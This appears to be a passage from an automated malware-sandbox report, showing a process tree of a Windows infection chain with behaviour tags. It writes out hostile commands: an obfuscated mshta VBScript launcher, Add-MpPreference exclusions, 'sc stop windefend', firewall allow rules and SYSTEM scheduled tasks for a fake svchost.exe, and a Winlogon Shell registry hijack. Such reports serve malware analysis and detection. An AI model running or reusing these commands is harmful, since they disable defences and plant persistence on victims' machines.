C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1616,16632930827041194589,8161983711722282801,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6540_337552502" --mojo-platform-channel-handle=2032 /prefetch:812⤵PID:7436
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"9⤵PID:8296
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:8772
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\cmkbfDAd_miQBvOKH4Fe2TD_.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:6444
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "cmkbfDAd_miQBvOKH4Fe2TD_.exe"12⤵
- Kills process with taskkill
PID:6624
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\C0tgNAOxqaCNg3uOrAPJqEce.exe"C:\Users\Admin\Pictures\Adobe Films\C0tgNAOxqaCNg3uOrAPJqEce.exe"9⤵PID:9128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9128 -s 172410⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:9028
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Pr94tBJFmmmBtB5jfTVqm8MB.exe"C:\Users\Admin\Pictures\Adobe Films\Pr94tBJFmmmBtB5jfTVqm8MB.exe"9⤵PID:8712
-
C:\Users\Admin\AppData\Local\Temp\is-N23A4.tmp\Pr94tBJFmmmBtB5jfTVqm8MB.tmp"C:\Users\Admin\AppData\Local\Temp\is-N23A4.tmp\Pr94tBJFmmmBtB5jfTVqm8MB.tmp" /SL5="$6050C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\Pr94tBJFmmmBtB5jfTVqm8MB.exe"10⤵
- Loads dropped DLL
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\is-GG4PD.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-GG4PD.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:1880 -
C:\Users\Admin\AppData\Local\Temp\e2-67f0b-c3a-d5aa5-8fcdac036f426\Baeqeloqeji.exe"C:\Users\Admin\AppData\Local\Temp\e2-67f0b-c3a-d5aa5-8fcdac036f426\Baeqeloqeji.exe"12⤵PID:5552
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e613⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:6728 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff86eec46f8,0x7ff86eec4708,0x7ff86eec471814⤵PID:7412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:214⤵PID:4192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:314⤵PID:7716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2112 /prefetch:114⤵PID:8308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2536 /prefetch:814⤵PID:2576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:114⤵PID:7424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:114⤵PID:5640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1904 /prefetch:114⤵PID:8156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:114⤵PID:4344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,10710484949333050181,13678803858819622095,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 /prefetch:814⤵PID:8360
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1f-7a238-8ea-7cb8a-8761cb366a4fa\Cyfocypafi.exe"C:\Users\Admin\AppData\Local\Temp\1f-7a238-8ea-7cb8a-8761cb366a4fa\Cyfocypafi.exe"12⤵PID:3956
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\amkldjg4.ylh\GcleanerEU.exe /eufive & exit13⤵PID:6496
-
C:\Users\Admin\AppData\Local\Temp\amkldjg4.ylh\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\amkldjg4.ylh\GcleanerEU.exe /eufive14⤵PID:2156
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 23615⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6476
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tevxtqqu.qdv\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\tevxtqqu.qdv\installer.exeC:\Users\Admin\AppData\Local\Temp\tevxtqqu.qdv\installer.exe /qn CAMPAIGN="654"14⤵
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:7160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe & exit13⤵PID:6508
-
C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exeC:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe14⤵PID:7740
-
C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe"C:\Users\Admin\AppData\Local\Temp\0wysc2ns.vfy\any.exe" -u15⤵PID:940
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵
- Loads dropped DLL
PID:6060
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ttrwv5wq.l3g\gcleaner.exe /mixfive & exit13⤵PID:1860
-
C:\Users\Admin\AppData\Local\Temp\ttrwv5wq.l3g\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ttrwv5wq.l3g\gcleaner.exe /mixfive14⤵PID:6536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aysi5tnv.xli\autosubplayer.exe /S & exit13⤵PID:4668
-
-
-
C:\Program Files\Windows Defender\APGWBTERQQ\foldershare.exe"C:\Program Files\Windows Defender\APGWBTERQQ\foldershare.exe" /VERYSILENT12⤵PID:9124
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\XncyffkwayF4lTgU16i6A8Zi.exe"C:\Users\Admin\Pictures\Adobe Films\XncyffkwayF4lTgU16i6A8Zi.exe"9⤵PID:3404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 29610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5396
-
-
-
C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe"C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe"9⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:9004 -
C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe"C:\Users\Admin\Pictures\Adobe Films\5qlTraWDq1vzRdVRwFZUNz29.exe" -u10⤵PID:6568
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Suspicious use of AdjustPrivilegeToken
PID:5152
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7716
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UYXncJ1J4Hle8NWjUMq5U4KZ.exe"C:\Users\Admin\Pictures\Adobe Films\UYXncJ1J4Hle8NWjUMq5U4KZ.exe"7⤵PID:6608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 2768⤵
- Program crash
PID:1052
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe"C:\Users\Admin\Pictures\Adobe Films\RfdHYMkUrnVfH1ZtERmjgC7e.exe"7⤵PID:6740
-
-
C:\Users\Admin\Pictures\Adobe Films\0jQNr3rBaYZ4IKwSbC3yTB8P.exe"C:\Users\Admin\Pictures\Adobe Films\0jQNr3rBaYZ4IKwSbC3yTB8P.exe"7⤵PID:5968
-
-
C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe"C:\Users\Admin\Pictures\Adobe Films\ImBQvx_Kr5O0lBuAItFuMM0V.exe"7⤵PID:6788
-
-
C:\Users\Admin\Pictures\Adobe Films\7elpvTmw1vT1ONC9ndp6H4va.exe"C:\Users\Admin\Pictures\Adobe Films\7elpvTmw1vT1ONC9ndp6H4va.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1288
-
-
C:\Users\Admin\Pictures\Adobe Films\T95LOChSK2FJnZ8sP6x6_E2w.exe"C:\Users\Admin\Pictures\Adobe Films\T95LOChSK2FJnZ8sP6x6_E2w.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4376 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵PID:6584
-
-
-
C:\Users\Admin\Pictures\Adobe Films\e8R37IpGW_6y4VHKwqVXv_JJ.exe"C:\Users\Admin\Pictures\Adobe Films\e8R37IpGW_6y4VHKwqVXv_JJ.exe"7⤵PID:3036
-
-
C:\Users\Admin\Pictures\Adobe Films\Bd4X2NxFXA5NEmJKfUAVox3h.exe"C:\Users\Admin\Pictures\Adobe Films\Bd4X2NxFXA5NEmJKfUAVox3h.exe"7⤵
- Executes dropped EXE
PID:6852
-
-
C:\Users\Admin\Pictures\Adobe Films\Q_fET_usQo2X_6EmGsXsx62w.exe"C:\Users\Admin\Pictures\Adobe Films\Q_fET_usQo2X_6EmGsXsx62w.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3824
-
-
C:\Users\Admin\Pictures\Adobe Films\GmSS5Vhk5wUk9_ol891okFe6.exe"C:\Users\Admin\Pictures\Adobe Films\GmSS5Vhk5wUk9_ol891okFe6.exe"7⤵PID:5984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 6848⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5824
-
-
-
C:\Users\Admin\Pictures\Adobe Films\HZF5DVkBv1ZqBbYSSg8j3oEv.exe"C:\Users\Admin\Pictures\Adobe Films\HZF5DVkBv1ZqBbYSSg8j3oEv.exe"7⤵
- Executes dropped EXE
PID:6820 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6820 -s 2808⤵
- Program crash
- Enumerates system info in registry
PID:1584
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CccUqSnvorEDEpUpxK4J3YF5.exe"C:\Users\Admin\Pictures\Adobe Films\CccUqSnvorEDEpUpxK4J3YF5.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5156
-
-
C:\Users\Admin\Pictures\Adobe Films\rNJcnZZc_xAGgCmOJGIzn_UI.exe"C:\Users\Admin\Pictures\Adobe Films\rNJcnZZc_xAGgCmOJGIzn_UI.exe"7⤵PID:6316
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵PID:7440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3472
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵PID:5164
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM8⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Creates scheduled task(s)
- Suspicious use of AdjustPrivilegeToken
PID:5932
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵PID:4308
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal8⤵
- Drops file in Windows directory
PID:5720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\9⤵PID:9016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \9⤵PID:7988
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵PID:8824
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes9⤵PID:7236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Enumerates system info in registry
PID:5348
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed1229427acd4bc167.exe5⤵PID:4192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed120b6f5c6d562.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3172
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 5245⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed126ca6605dbec0399.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
PID:3216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed128c2773227671b3f.exe5⤵
- Suspicious use of WriteProcessMemory
PID:5016
-
-
-
-
-
C:\Windows\SysWOW64\systray.exe"C:\Windows\SysWOW64\systray.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:6512 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\ArGiap3960SUZs1dAEDT_gNj.exe"3⤵PID:6056
-
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵PID:3116
-
-
C:\Users\Admin\AppData\Local\Temp\8355.exeC:\Users\Admin\AppData\Local\Temp\8355.exe2⤵
- Suspicious use of SetThreadContext
PID:4468 -
C:\Users\Admin\AppData\Local\Temp\8355.exeC:\Users\Admin\AppData\Local\Temp\8355.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7540
-
-
-
C:\Users\Admin\AppData\Local\Temp\EA3E.exeC:\Users\Admin\AppData\Local\Temp\EA3E.exe2⤵PID:7384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7384 -s 2763⤵
- Program crash
PID:9004
-
-
-
C:\Users\Admin\AppData\Local\Temp\5DD8.exeC:\Users\Admin\AppData\Local\Temp\5DD8.exe2⤵PID:7404
-
-
C:\Users\Admin\AppData\Local\Temp\B0AD.exeC:\Users\Admin\AppData\Local\Temp\B0AD.exe2⤵PID:5608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6492
-
-
-
C:\Users\Admin\AppData\Local\Temp\1CE5.exeC:\Users\Admin\AppData\Local\Temp\1CE5.exe2⤵
- Suspicious use of SetThreadContext
PID:8676 -
C:\Users\Admin\AppData\Local\Temp\1CE5.exeC:\Users\Admin\AppData\Local\Temp\1CE5.exe3⤵PID:7488
-
-
-
C:\Users\Admin\AppData\Local\Temp\A20F.exeC:\Users\Admin\AppData\Local\Temp\A20F.exe2⤵PID:2440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 2803⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3032
-
-
-
C:\Users\Admin\AppData\Local\Temp\D872.exeC:\Users\Admin\AppData\Local\Temp\D872.exe2⤵PID:2312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 2923⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5288
-
-
-
C:\Users\Admin\AppData\Local\Temp\9C.exeC:\Users\Admin\AppData\Local\Temp\9C.exe2⤵PID:9072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9072 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6400
-
-
-
C:\Users\Admin\AppData\Local\Temp\83D7.exeC:\Users\Admin\AppData\Local\Temp\83D7.exe2⤵PID:8552
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com3⤵PID:1916
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6420
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com3⤵PID:8368
-
-
-
C:\Users\Admin\AppData\Local\Temp\25E.exeC:\Users\Admin\AppData\Local\Temp\25E.exe2⤵PID:3376
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ipconfig /release3⤵PID:8456
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /release4⤵
- Gathers network information
PID:5392
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com3⤵PID:5096
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" twitter.com4⤵
- Runs ping.exe
PID:4616
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com3⤵PID:5876
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" twitter.com4⤵
- Runs ping.exe
PID:6860
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com3⤵PID:4768
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
PID:6972
-
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" twitter.com4⤵
- Runs ping.exe
PID:4604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\72AD.exeC:\Users\Admin\AppData\Local\Temp\72AD.exe2⤵PID:7796
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"3⤵PID:5576
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"4⤵PID:6908
-
-
-
C:\Users\Admin\AppData\Local\chromedrlver.exe"C:\Users\Admin\AppData\Local\chromedrlver.exe"3⤵PID:8240
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"4⤵PID:8056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\877E.exeC:\Users\Admin\AppData\Local\Temp\877E.exe2⤵
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System policy modification
PID:2220 -
C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:4664
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cc393749-fc75-468c-a5ce-51db373dc6bf\test.bat"4⤵PID:7148
-
-
-
C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵PID:2144
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3f50dfb5-768c-4473-ae46-8ce233874c5a\test.bat"4⤵PID:8220
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5968
-
-
C:\Windows\system32\sc.exesc stop windefend5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6748
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵PID:6896
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\877E.exe" -Force3⤵PID:4356
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force3⤵PID:8828
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force3⤵PID:8228
-
-
